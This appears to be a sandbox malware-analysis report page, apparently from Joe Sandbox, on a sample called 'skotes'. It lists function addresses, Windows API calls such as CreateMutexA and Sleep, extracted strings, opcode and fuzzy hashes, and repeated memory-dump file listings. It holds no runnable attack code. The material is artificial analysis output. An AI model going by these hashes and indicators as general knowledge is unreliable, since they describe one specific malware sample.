Opcode ID: 1b75c2e741d113611aef5fc2f47dedb33b02e7b9c5c75b37c839a9f78b6ca30c
Instruction ID: 8b1dd58f8e8dfbfcba7e56335f55b6914f3ffcfc31f01b0a67cea5166bddf09b
Opcode Fuzzy Hash: 1b75c2e741d113611aef5fc2f47dedb33b02e7b9c5c75b37c839a9f78b6ca30c
Instruction Fuzzy Hash: 593109717003009BEB18DB78DD89BAEB772DB86314F24862EE014A73D5D77D8990875B

Function 00409ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: cac3d9346045ec188d8f5fbd6bf686bea102927fedf78eba4681f6a1cf666db5
Instruction ID: 02bc97cc144e61c0b7e670ed4b9a2626c2d02555ca28c5131db3ed0d1db19b0b
Opcode Fuzzy Hash: cac3d9346045ec188d8f5fbd6bf686bea102927fedf78eba4681f6a1cf666db5
Instruction Fuzzy Hash: B02145717042009BEB189F68EC8976DB761EBD2310F20462FE408A72D2DB7D9D90861A

Function 0040A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: cece2242de861a7a7bd8817ec1a4ca88cd4c7538e7b9945be5ae67d8dee0d83c
Instruction ID: 7e49bbca7a064522a922c657a455da9a6dee0cc408eea34a40f58dcf2c561b63
Opcode Fuzzy Hash: cece2242de861a7a7bd8817ec1a4ca88cd4c7538e7b9945be5ae67d8dee0d83c
Instruction Fuzzy Hash: 1C216D727453009BE724BB69889A76EB211DF91300F24883FE408F63D2DB7D8891829F

Function 0040A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 98dd95099620559832ebd42d8f8fbd1b813ed2d71c2de634a1083ab86263a81e
Instruction ID: e64d2e86cc484f4b99da26ece9f056be2a6a5adf17e376f2c5d8e235ad1a2d35
Opcode Fuzzy Hash: 98dd95099620559832ebd42d8f8fbd1b813ed2d71c2de634a1083ab86263a81e
Instruction Fuzzy Hash: BC2145727003009BEB189B68DC897ADB762DB92311F24462FE408E77D1D77D89A0835B

Function 0043D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0043A813,00000001,00000364,00000006,000000FF,?,0043EE3F,?,00000004,00000000,?,?), ref: 0043D870

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726857921.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726938598.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726960603.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726975160.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a599c01c830e3a6f306c81f85926a25617f20dfa98d3ae9b9ede079944bf944f
Instruction ID: 98eadcf290edf2217396f0d342befbee2ed41839c936de3a1171de8bd0755ccb
Opcode Fuzzy Hash: a599c01c830e3a6f306c81f85926a25617f20dfa98d3ae9b9ede079944bf944f
Instruction Fuzzy Hash: 29F05932D0112066EB283A33BC01A1B37599F4D770F25B027FC24A7280DA28FC0185E9

Non-executed Functions

Function 0043CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0043CC66

Strings

vC, xrefs: 0043CBE1

Memory Dump Source

Source File: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1723487807.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1723598147.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1724503619.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725120350.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725143023.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725157550.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725171911.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725536980.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725597156.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725618677.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725668295.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725683350.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725696951.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725710984.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725731210.000000000061A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725744558.000000000061B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725771303.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725789629.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725827766.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725879202.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725896770.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725915563.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725930463.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725949147.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725971536.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1725990755.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726005323.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726023306.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726043538.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726056594.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726074827.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726148456.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726204549.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726220346.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726240833.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726599148.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726620865.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726640335.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726656954.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726696204.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726724454.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726744953.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1726814635.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
